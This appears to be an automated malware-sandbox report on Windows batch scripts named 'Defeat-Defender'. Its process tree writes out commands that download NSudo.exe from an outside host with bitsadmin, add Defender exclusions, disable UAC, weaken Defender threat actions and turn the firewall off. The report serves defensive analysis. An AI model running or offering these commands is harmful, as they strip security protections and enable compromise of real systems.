Analysis

  • max time kernel
    145s
  • max time network
    138s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    06-08-2024 19:38

General

  • Target

    https://www.pixilart.com/draw?ref=home-page#

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pixilart.com/draw?ref=home-page#
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe09323cb8,0x7ffe09323cc8,0x7ffe09323cd8
      2⤵
        PID:3684
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
        2⤵
          PID:1412
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4008
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
          2⤵
            PID:3560
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
            2⤵
              PID:1864
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
              2⤵
                PID:4524
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:908
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
                2⤵
                  PID:2372
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
                  2⤵
                    PID:4704
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                    2⤵
                      PID:4692
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1600
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                      2⤵
                        PID:3280
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
                        2⤵
                          PID:2104
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3256 /prefetch:8
                          2⤵
                            PID:1264
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5916 /prefetch:8
                            2⤵
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1052
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
                            2⤵
                              PID:4692
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
                              2⤵
                                PID:4308
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                                2⤵
                                  PID:780
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
                                  2⤵
                                    PID:1172
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
                                    2⤵
                                    • NTFS ADS
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5036
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:1744
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:976
                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                      1⤵
                                      • Modifies registry class
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4204
                                    • C:\Windows\System32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                      1⤵
                                        PID:4288
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                        1⤵
                                          PID:3048
                                        • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                          C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                          1⤵
                                          • Drops file in Windows directory
                                          PID:3908
                                        • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                          C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                          1⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4716
                                        • C:\Windows\system32\OpenWith.exe
                                          C:\Windows\system32\OpenWith.exe -Embedding
                                          1⤵
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4772
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\run.bat" "
                                          1⤵
                                            PID:1792
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "
                                            1⤵
                                              PID:1808
                                              • C:\Windows\system32\cacls.exe
                                                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                                2⤵
                                                  PID:1828
                                                • C:\Windows\system32\wscript.exe
                                                  wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
                                                  2⤵
                                                    PID:696
                                                  • C:\Windows\system32\bitsadmin.exe
                                                    bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
                                                    2⤵
                                                    • Download via BitsAdmin
                                                    PID:3100
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3900
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1592
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
                                                    2⤵
                                                    • UAC bypass
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1548
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2796
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1576
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3840
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3816
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4704
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1712
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1492
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2444
                                                    • C:\Windows\system32\netsh.exe
                                                      "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                      3⤵
                                                      • Modifies Windows Firewall
                                                      • Event Triggered Execution: Netsh Helper DLL
                                                      PID:2504
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "
                                                  1⤵
                                                    PID:5064
                                                    • C:\Windows\system32\cacls.exe
                                                      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                                      2⤵
                                                        PID:1576
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "
                                                      1⤵
                                                        PID:4580
                                                        • C:\Windows\system32\cacls.exe
                                                          "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                                          2⤵
                                                            PID:2836
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "
                                                          1⤵
                                                            PID:784
                                                            • C:\Windows\system32\cacls.exe
                                                              "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                                              2⤵
                                                                PID:3484
                                                              • C:\Windows\system32\wscript.exe
                                                                wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
                                                                2⤵
                                                                  PID:2060
                                                                • C:\Windows\system32\bitsadmin.exe
                                                                  bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
                                                                  2⤵
                                                                  • Download via BitsAdmin
                                                                  PID:3792
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3816
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3340
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
                                                                  2⤵
                                                                  • UAC bypass
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3476
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:240
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1320
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1576
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4856
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1920
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4648
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4704
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5008
                                                                  • C:\Windows\system32\netsh.exe
                                                                    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                    3⤵
                                                                    • Modifies Windows Firewall
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    PID:3020

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                627073ee3ca9676911bee35548eff2b8

                                                                SHA1

                                                                4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                SHA256

                                                                85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                SHA512

                                                                3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                2ee16858e751901224340cabb25e5704

                                                                SHA1

                                                                24e0d2d301f282fb8e492e9df0b36603b28477b2

                                                                SHA256

                                                                e9784fcff01f83f4925f23e3a24bce63314ea503c2091f7309c014895fead33c

                                                                SHA512

                                                                bd9994c2fb4bf097ce7ffea412a2bed97e3af386108ab6aab0df9472a92d4bd94489bb9c36750a92f9818fa3ea6d1756497f5364611e6ebd36de4cd14e9a0fba

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                ea667b2dedf919487c556b97119cf88a

                                                                SHA1

                                                                0ee7b1da90be47cc31406f4dba755fd083a29762

                                                                SHA256

                                                                9e7e47ebf490ba409eab3be0314fa695bf28f4764f4875c7568a54337f2df70f

                                                                SHA512

                                                                832391afcac34fc6c949dee8120f2a5f83ca68c159ff707751d844b085c7496930f0c8fd8313fd8f10a5f5725138be651953934aa79b087ba3c6dd22eaa49c72

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                db2b89dd4b1fd9cfc8fadb5046ebe67b

                                                                SHA1

                                                                34eaf971922351327fcd802fc89eececcdc9febe

                                                                SHA256

                                                                06c5e271e2186d2942bccd2d7b4473ee686ad8f7ffb54b7c7074706a696c4e55

                                                                SHA512

                                                                58ffd46fae05dd9a3dfc5b9fe4a7ead5c6659eefa8673faf38d24383f8e2e89bd9f3b5064d1b48ba5837472128fe46de972e5d93d2c0ecaa1f77da7593842532

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                c863a889456175015e3b84781b82d90a

                                                                SHA1

                                                                becee9f4ad233f01bf3055d8d71a6cba8f858594

                                                                SHA256

                                                                67b6119bb093fc2f80352fe044b33b799a3d3e030981fe896f8cdb03140f0f91

                                                                SHA512

                                                                745c5a6b231aaac1f71d2cc379e54ad009a02c7d57b5c3427f14b531991a8373f585e347acea4415da61956f7e8e266d863c3dec2b6d71f3ad2d5ea36e3b895f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                5KB

                                                                MD5

                                                                2a611e8b405da657d669ad90231ba583

                                                                SHA1

                                                                8703e98403b2e0bc58d0132cfd50bc9a28352883

                                                                SHA256

                                                                794d26641f66b73816c67f6064af5b776a273d0a7aea2f46b7c7756be8d3c335

                                                                SHA512

                                                                ec9a39c76b542ff1790793eacc44dd376d5c33124358a1eacac74adc450121189a02448f9bdcb57d30597d64560173486d461a4da9ed034f3208c05d7d1ddffb

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                ed5358530afa92987e6a924f110e0989

                                                                SHA1

                                                                a55ab1627e57e05b7ee754e86b83f6e30ed79a77

                                                                SHA256

                                                                00054ddc6e655e0cbcfe7cf2287e095faa66fc042da6679aabd5b10194a36765

                                                                SHA512

                                                                ae7f1d0cbd504892c0e502814939d89753214008c6670878f63fdf8728f5074134a735e2d76389986e28341f0520275a7999ba4e43a2160f90d9d88d26e9168b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                eef35a099322a43dbcc347f04ce3b1bf

                                                                SHA1

                                                                6052674ba2ec8f0052596ae6bc7ef198a02e3d4a

                                                                SHA256

                                                                385d206f0a70a81b0dfa1ee8b9c118ef8894dd64f3dca06299291464dbb013d2

                                                                SHA512

                                                                7856447fca3d2dbdb0e55e7c5fc62fd18cd2d06c02c04b825539b2dc3d2895c91bd92327e54dcb2d7704c4ac204f279f38c506dfe64f715f7481d3443c1ce831

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                d525e402ee24d4fc30dc3e4e75e52efb

                                                                SHA1

                                                                12517d3ab3b3cc2e659799a8a2792c0fc0a835d8

                                                                SHA256

                                                                e18e6d106b8cd00b79bc614c58669c6350fe1e7f78d6d884fac5284906f6ebb2

                                                                SHA512

                                                                52a0ec08697a4ba96b0761e9f5a24f933cc32e45a64894a62f7e046ff6740e820b0b836346714d992cab99cb831a3a8dbbcad80036ccd110b1abc6793482d73b

